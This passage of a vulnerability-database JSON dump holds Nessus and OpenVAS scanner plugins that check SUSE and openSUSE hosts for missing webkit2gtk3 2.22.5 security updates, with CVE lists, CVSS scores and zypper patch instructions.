reference:\"libjavascriptcoregtk-4_0-18-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk3-lang-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-debuginfo-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-debugsource-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-devel-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-minibrowser-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-minibrowser-debuginfo-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.22.5-lp150.2.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-debuginfo-2.22.5-lp150.2.9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:11:21", "description": "This update for webkit2gtk3 to version 2.22.5 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2018-4372, CVE-2018-4345, CVE-2018-4386, CVE-2018-4375, CVE-2018-4376, CVE-2018-4378, CVE-2018-4382, CVE-2018-4392, CVE-2018-4416, CVE-2018-4191, CVE-2018-4197, CVE-2018-4299, CVE-2018-4306, CVE-2018-4309, CVE-2018-4312, CVE-2018-4314, CVE-2018-4315, CVE-2018-4316, CVE-2018-4317, CVE-2018-4318, CVE-2018-4319, CVE-2018-4323, CVE-2018-4328, CVE-2018-4358, CVE-2018-4359, CVE-2018-4361, CVE-2018-4373, CVE-2018-4162, CVE-2018-4163, CVE-2018-4165, CVE-2018-11713, CVE-2018-4207, CVE-2018-4208, CVE-2018-4209, CVE-2018-4210, CVE-2018-4212, CVE-2018-4213, CVE-2018-4437, CVE-2018-4438, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4464 (bsc#1119558, bsc#1116998, bsc#1110279)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-16T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2019:0092-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11713", "CVE-2018-4162", "CVE-2018-4163", "CVE-2018-4165", "CVE-2018-4191", "CVE-2018-4197", "CVE-2018-4207", "CVE-2018-4208", "CVE-2018-4209", "CVE-2018-4210", "CVE-2018-4212", "CVE-2018-4213", "CVE-2018-4299", "CVE-2018-4306", "CVE-2018-4309", "CVE-2018-4312", "CVE-2018-4314", "CVE-2018-4315", "CVE-2018-4316", "CVE-2018-4317", "CVE-2018-4318", "CVE-2018-4319", "CVE-2018-4323", "CVE-2018-4328", "CVE-2018-4345", "CVE-2018-4358", "CVE-2018-4359", "CVE-2018-4361", "CVE-2018-4372", "CVE-2018-4373", "CVE-2018-4375", "CVE-2018-4376", "CVE-2018-4378", "CVE-2018-4382", "CVE-2018-4386", "CVE-2018-4392", "CVE-2018-4416", "CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464"], "modified": "2021-02-10T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension", "p-cpe:/a:novell:suse_linux:webkit-jsc", "p-cpe:/a:novell:suse_linux:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2019-0092-1.NASL", "href": "https://www.tenable.com/plugins/nessus/121206", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0092-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121206);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/10\");\n\n script_cve_id(\"CVE-2018-11713\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\", \"CVE-2018-4191\", \"CVE-2018-4197\", \"CVE-2018-4207\", \"CVE-2018-4208\", \"CVE-2018-4209\", \"CVE-2018-4210\", \"CVE-2018-4212\", \"CVE-2018-4213\", \"CVE-2018-4299\", \"CVE-2018-4306\", \"CVE-2018-4309\", \"CVE-2018-4312\", \"CVE-2018-4314\", \"CVE-2018-4315\", \"CVE-2018-4316\", \"CVE-2018-4317\", \"CVE-2018-4318\", \"CVE-2018-4319\", \"CVE-2018-4323\", \"CVE-2018-4328\", \"CVE-2018-4345\", \"CVE-2018-4358\", \"CVE-2018-4359\", \"CVE-2018-4361\", \"CVE-2018-4372\", \"CVE-2018-4373\", \"CVE-2018-4375\", \"CVE-2018-4376\", \"CVE-2018-4378\", \"CVE-2018-4382\", \"CVE-2018-4386\", \"CVE-2018-4392\", \"CVE-2018-4416\", \"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4464\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2019:0092-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for webkit2gtk3 to version 2.22.5 fixes the following\nissues :\n\nSecurity issues fixed :\n\nCVE-2018-4372, CVE-2018-4345, CVE-2018-4386, CVE-2018-4375,\nCVE-2018-4376, CVE-2018-4378, CVE-2018-4382, CVE-2018-4392,\nCVE-2018-4416, CVE-2018-4191, CVE-2018-4197, CVE-2018-4299,\nCVE-2018-4306, CVE-2018-4309, CVE-2018-4312, CVE-2018-4314,\nCVE-2018-4315, CVE-2018-4316, CVE-2018-4317, CVE-2018-4318,\nCVE-2018-4319, CVE-2018-4323, CVE-2018-4328, CVE-2018-4358,\nCVE-2018-4359, CVE-2018-4361, CVE-2018-4373, CVE-2018-4162,\nCVE-2018-4163, CVE-2018-4165, CVE-2018-11713, CVE-2018-4207,\nCVE-2018-4208, CVE-2018-4209, CVE-2018-4210, CVE-2018-4212,\nCVE-2018-4213, CVE-2018-4437, CVE-2018-4438, CVE-2018-4441,\nCVE-2018-4442, CVE-2018-4443, CVE-2018-4464 (bsc#1119558, bsc#1116998,\nbsc#1110279)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1110279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1116998\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11713/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4162/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4163/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4165/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4191/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4197/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4207/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4208/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4209/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4210/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4212/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4213/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4299/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4306/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4309/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4312/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4314/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4315/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4316/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4317/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4318/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4319/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4323/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4328/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4345/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4358/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4359/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4361/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4372/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4373/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4375/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4376/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4378/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4382/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4386/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4392/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4416/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4437/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4438/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4441/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4442/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4443/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4464/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190092-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2c8c2c8c\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-92=1\n\nSUSE Linux Enterprise Module for Desktop Applications 15:zypper in -t\npatch SUSE-SLE-Module-Desktop-Applications-15-2019-92=1\n\nSUSE Linux Enterprise Module for Basesystem 15:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-2019-92=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Webkit JIT Exploit for iOS 7.1.2');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit-jsc-4-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit-jsc-4-debuginfo-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit-jsc-4-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit-jsc-4-debuginfo-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.22.5-3.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.22.5-3.13.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-01-31T16:47:29", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-02-01T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:0108-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4438", "CVE-2018-4464", "CVE-2018-4441"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852266", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852266", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852266\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4464\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-02-01 04:03:21 +0100 (Fri, 01 Feb 2019)\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:0108-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:0108-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-01/msg00050.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the openSUSE-SU-2019:0108-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.22.5 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-4438: Fixed a logic issue which lead to memory corruption\n (bsc#1119554)\n\n - CVE-2018-4437, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443,\n CVE-2018-4464: Fixed multiple memory corruption issues with improved\n memory handling (bsc#1119553, bsc#1119555, bsc#1119556, bsc#1119557,\n bsc#1119558)\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2019-108=1\");\n\n script_tag(name:\"affected\", value:\"webkit2gtk3 on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.22.5~18.1\", 